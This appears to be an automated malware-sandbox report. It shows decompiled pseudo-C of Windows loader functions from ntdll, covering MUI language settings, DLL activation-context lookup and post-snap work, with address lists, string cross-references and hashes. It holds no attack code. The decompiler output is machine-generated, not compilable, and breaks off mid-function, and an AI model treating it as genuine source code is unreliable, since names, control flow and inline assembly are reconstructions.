					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01991B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01991B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01991B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01991B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01991B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L019A4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E019CF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E019D1370(_t276, 0x1964e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E019CBB40(0,  &_v68, _t170);
									if(L019943C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E019CBB40(_t257,  &_v68, _t243);
								if(L019943C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E019D1370(_t278, 0x1964e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L019A4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E019CF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E019D1370(_v16, 0x1964e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E019CBB40(_t262,  &_v68, _t244);
								if(L019943C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E019D1370(_t282, 0x1964e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E019CBB40(_t262,  &_v68, _t201);
							if(L019943C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L019A4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E019CF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E019D1370(_t280, 0x1964e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E019CBB40(_t267,  &_v68, _t245);
							if(L019943C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E019D1370(_t284, 0x1964e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E019CBB40(_t267,  &_v68, _t224);
						if(L019943C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L019A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01993d3c
0x01993d42
0x01993d44
0x01993d46
0x01993d49
0x01993d4c
0x01993d4f
0x01993d52
0x01993d55
0x01993d58
0x01993d5b
0x01993d5f
0x01993d61
0x01993d66
0x019e8213
0x019e8218
0x01994085
0x01994088
0x0199408e
0x01994094
0x0199409a
0x019940a0
0x019940a6
0x019940a9
0x019940af
0x019940b6
0x019940bd
0x019940bd
0x01993d83
0x019e821f
0x019e8229
0x019e8238
0x019e8238
0x019e823d
0x019e823d
0x01993da0
0x01993daf
0x01993db5
0x01993dba
0x01993dba
0x01993dd4
0x01993e94
0x01993eab
0x01993f6d
0x01993f84
0x0199406b
0x0199406b
0x0199406e
0x0199406e
0x01994070
0x01994074
0x019e8351
0x019e8351
0x0199407a
0x0199407f
0x019e835d
0x019e8370
0x019e8377
0x019e8379
0x019e837c
0x019e837c
0x019e835d
0x00000000
0x0199407f
0x01993f8a
0x01993f8d
0x01993f90
0x01993f95
0x019e830d
0x019e830f
0x01993f9b
0x01993fac
0x01993fae
0x01993fb1
0x01993fb1
0x01993fb6
0x019e8317
0x019e831a
0x00000000
0x01993fbc
0x01993fc1
0x01993fc9
0x01993fd7
0x01993fda
0x01993fdd
0x01994021
0x01994021
0x01994029
0x01994030
0x01994044
0x01994046
0x01994046
0x01994044
0x01994049
0x019e8327
0x019e8334
0x019e8339
0x019e833c
0x0199404f
0x0199404f
0x0199404f
0x01994051
0x01994056
0x01994063
0x01994063
0x01994068
0x00000000
0x01994068
0x01993fdf
0x01993fe2
0x01993fe4
0x01993fe7
0x01993fef
0x01994003
0x01994005
0x01994005
0x0199400c
0x01994013
0x01994016
0x01994017
0x0199401b
0x0199401e
0x00000000
0x0199401e
0x01993fb6
0x01993eb1
0x01993eb4
0x01993eb7
0x01993ebc
0x019e82a9
0x019e82ab
0x01993ec2
0x01993ed3
0x01993ed5
0x01993ed8
0x01993ed8
0x01993edd
0x019e82b3
0x019e82b6
0x00000000
0x01993ee3
0x01993ee8
0x01993eed
0x01993ef0
0x01993ef3
0x01993f02
0x01993f05
0x01993f08
0x019e82c0
0x019e82c3
0x019e82c5
0x019e82c8
0x019e82d0
0x019e82e4
0x019e82e6
0x019e82e6
0x019e82ed
0x019e82f4
0x019e82f7
0x019e82f8
0x019e82fc
0x019e82ff
0x019e82ff
0x01993f0e
0x01993f11
0x01993f16
0x01993f1d
0x01993f31
0x019e8307
0x019e8307
0x01993f31
0x01993f39
0x01993f48
0x01993f4d
0x01993f50
0x01993f50
0x01993f53
0x01993f58
0x01993f65
0x01993f65
0x01993f6a
0x00000000
0x01993f6a
0x01993edd
0x01993dda
0x01993ddd
0x01993de0
0x01993de5
0x019e8245
0x01993deb
0x01993df7
0x01993dfc
0x01993dfe
0x01993e01
0x01993e01
0x01993e06
0x019e824d
0x019e824f
0x019e8254
0x00000000
0x01993e0c
0x01993e11
0x01993e16
0x01993e19
0x01993e29
0x01993e2c
0x01993e2f
0x019e825c
0x019e825f
0x019e8261
0x019e8264
0x019e826c
0x019e8280
0x019e8282
0x019e8282
0x019e8289
0x019e8290
0x019e8293
0x019e8294
0x019e8298
0x019e829b
0x019e829b
0x01993e35
0x01993e38
0x01993e3d
0x01993e44
0x01993e58
0x019e82a3
0x019e82a3
0x01993e58
0x01993e60
0x01993e6f
0x01993e74
0x01993e77
0x01993e77
0x01993e7a
0x01993e7f
0x01993e8c
0x01993e8c
0x01993e91
0x00000000
0x01993e91

Strings

WindowsExcludedProcs, xrefs: 01993D6F
Kernel-MUI-Language-Allowed, xrefs: 01993DC0
Kernel-MUI-Language-SKU, xrefs: 01993F70
Kernel-MUI-Number-Allowed, xrefs: 01993D8C
Kernel-MUI-Language-Disallowed, xrefs: 01993E97

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 9364beecf65700d86df8db3b56dce2f2bc7be3a0c0ac8c5b24bda7c7beaf2c4b
Instruction ID: 5f568ba44a74b428f44644fc92250af9e49c9e2f0fe14cca8c0032aa2e1affcc
Opcode Fuzzy Hash: 9364beecf65700d86df8db3b56dce2f2bc7be3a0c0ac8c5b24bda7c7beaf2c4b
Instruction Fuzzy Hash: B6F12D72D00619EBDF16DFE8C9409EEBBBDFF58650F14446AE509A7210E7359E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 019B8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E019B8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1a7d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1a78464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1a75780 & 0x00000003) != 0) {
							E01A05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1a75780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E019CB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1a77984; // 0x16c2b40
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1a78464; // 0x75150110
					 *0x1a7b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E019B9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1a75780 & 0x00000005) != 0) {
						_push(_t49);
						E01A05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x019b8e0f
0x019b8e16
0x019b8e19
0x019b8e1b
0x019b8e21
0x019b8e7f
0x019b8e85
0x019f9354
0x019f936c
0x019f9371
0x019f937b
0x019f9381
0x019f9381
0x019f937b
0x019b8e9d
0x019b8e9d
0x019b8e29
0x019b8e2c
0x019b8e38
0x019b8e3e
0x019b8e43
0x019b8eb5
0x019b8eb9
0x019f92aa
0x019f92af
0x019f92e8
0x019f92e8
0x019f92af
0x019b8eb9
0x019b8e45
0x019b8e53
0x019b8e5b
0x019b8e5f
0x019b8e78
0x019b8e78
0x019b8e7d
0x019b8ec3
0x019b8ecd
0x019b8ed2
0x019b8ed2
0x019b8ec5
0x019b8ec5
0x00000000
0x019b8e7d
0x019b8e67
0x019b8ea4
0x019f931a
0x00000000
0x00000000
0x019f9320
0x019b8ea4
0x019b8e70
0x019f9325
0x019f9340
0x019f9345
0x019f9345
0x019b8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 019F933B, 019F9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 019F932A
LdrpFindDllActivationContext, xrefs: 019F9331, 019F935D
Querying the active activation context failed with status 0x%08lx, xrefs: 019F9357

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: ee75431d64adf9cdca1c89f69468bf72a4f2dd43122b4656e746ad1c3d3ad526
Instruction ID: 9efdfef0b834053b7df1fa9fa19cb570f533611835e15c4e8f8d7b9a0be72d56
Opcode Fuzzy Hash: ee75431d64adf9cdca1c89f69468bf72a4f2dd43122b4656e746ad1c3d3ad526
Instruction Fuzzy Hash: 63414A35A00315AFDF36BA1CCECCBF9B6ACAB4824AF09452DE90C57051E770BD808791

Uniqueness

Uniqueness Score: -1.00%

Function 01998794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01998794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0199934A() != 0) {
								_t159 = E01A0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1a75780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01A05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1a75780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0199849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01998999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01998999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1a75c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1a75c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E019A2280(_t92, 0x1a786cc);
															_t94 = E01A59DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E019B61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1a75c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01998A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1a75c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1a75c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E019CF380(_t136, 0x1961184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E019A2280(_t108, 0x1a786cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E019B61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01A59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0199FFB0(_t118, _t156, 0x1a786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E019C9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01998799
0x0199879d
0x019987a1
0x019987a3
0x019987a8
0x019987c3
0x019987c3
0x019987c8
0x019987d1
0x019987d4
0x019987d8
0x019987e5
0x019987ec
0x019e9bfe
0x019e9c00
0x019e9c02
0x019e9c08
0x019e9c0d
0x019e9c0f
0x019e9c14
0x019e9c2d
0x019e9c32
0x019e9c37
0x019e9c3a
0x019e9c3c
0x019e9c42
0x019e9c42
0x019e9c3c
0x019e9c02
0x019987da
0x019987df
0x019987e3
0x00000000
0x00000000
0x019987e3
0x019987f2
0x00000000
0x019987fb
0x019987fd
0x019987fe
0x0199880e
0x0199880f
0x01998810
0x01998814
0x0199881a
0x0199881c
0x0199881f
0x01998821
0x01998822
0x01998824
0x01998826
0x0199882c
0x0199882e
0x019e9c48
0x019e9c48
0x01998834
0x01998834
0x01998837
0x00000000
0x00000000
0x01998837
0x0199882e
0x0199883d
0x01998840
0x01998843
0x01998846
0x01998849
0x0199884c
0x0199884e
0x01998850
0x01998852
0x01998854
0x01998857
0x019988b4
0x019988b6
0x019988b6
0x01998859
0x01998859
0x01998859
0x01998861
0x01998866
0x0199886a
0x0199893d
0x01998941
0x00000000
0x01998947
0x01998947
0x0199894a
0x0199894c
0x00000000
0x01998952
0x01998955
0x0199895a
0x0199895d
0x0199895d
0x0199895f
0x01998961
0x01998961
0x01998968
0x00000000
0x00000000
0x0199896a
0x0199896b
0x0199896e
0x00000000
0x01998970
0x01998970
0x01998970
0x01998970
0x01998972
0x01998972
0x01998974
0x00000000
0x0199897a
0x0199897a
0x0199897d
0x00000000
0x01998983
0x019e9c65
0x019e9c6d
0x019e9c72
0x019e9c75
0x019e9c75
0x019e9c82
0x019e9c86
0x019e9c87
0x019e9c88
0x019e9c89
0x019e9c8c
0x019e9c90
0x019e9c95
0x019e9c97
0x019e9ca0
0x019e9ca3
0x019e9ca9
0x019e9ca9
0x00000000
0x019e9ca9
0x019e9ca3
0x00000000
0x019e9c97
0x0199897d
0x00000000
0x01998974
0x01998988
0x01998992
0x01998996
0x00000000
0x01998996
0x0199894c
0x00000000
0x01998870
0x0199887b
0x0199887d
0x0199887f
0x01998881
0x01998884
0x01998884
0x01998886
0x01998889
0x0199888c
0x0199888e
0x01998891
0x01998891
0x01998898
0x00000000
0x00000000
0x0199889a
0x0199889b
0x0199889e
0x00000000
0x00000000
0x019988a0
0x019988a8
0x019988b0
0x019988b2
0x019988d3
0x019988d5
0x00000000
0x019988d7
0x019988db
0x019988dc
0x019988e0
0x019988e8
0x019988ee
0x019988f0
0x019988f3
0x019988fc
0x01998901
0x01998906
0x0199890c
0x0199890c
0x0199890f
0x01998916
0x01998917
0x01998918
0x01998919
0x0199891a
0x0199891f
0x01998921
0x019e9c52
0x019e9c55
0x019e9c5b
0x019e9cac
0x019e9cc0
0x019e9cc0
0x019e9c55
0x01998927
0x01998927
0x0199892f
0x01998933
0x00000000
0x019988f5
0x019988f5
0x00000000
0x019988f7
0x019988f7
0x019988fa
0x00000000
0x00000000
0x00000000
0x00000000
0x019988fa
0x019988f5
0x019988f3
0x00000000
0x019988d5
0x00000000
0x019988b2
0x019988c9
0x00000000
0x019988c9
0x0199887f
0x0199886a
0x01998857
0x01998852
0x019988bf
0x019988bf
0x019987aa
0x019987ad
0x019987ae
0x019987b4
0x019987b5
0x019987b6
0x019987b8
0x019987bd
0x019987c1
0x019987f4
0x019987fa
0x00000000
0x00000000
0x00000000
0x019987c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 019E9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 019E9C18
LdrpDoPostSnapWork, xrefs: 019E9C1E

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 6ebf6a1da5deff98d0b6b48c5ea9579fecf56ff774c914039c743ff88b2b0177
Instruction ID: ed2011eedd69b69a3f40e8f26a253ec76c215d8ba4d03ed0e8376422b7611ac6
Opcode Fuzzy Hash: 6ebf6a1da5deff98d0b6b48c5ea9579fecf56ff774c914039c743ff88b2b0177
Instruction Fuzzy Hash: FD910531A0020AEFDF19DF5DD880ABA77B9FF86315B44406DD90DAB241D730E911CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01997E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01997E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0199CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0198C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
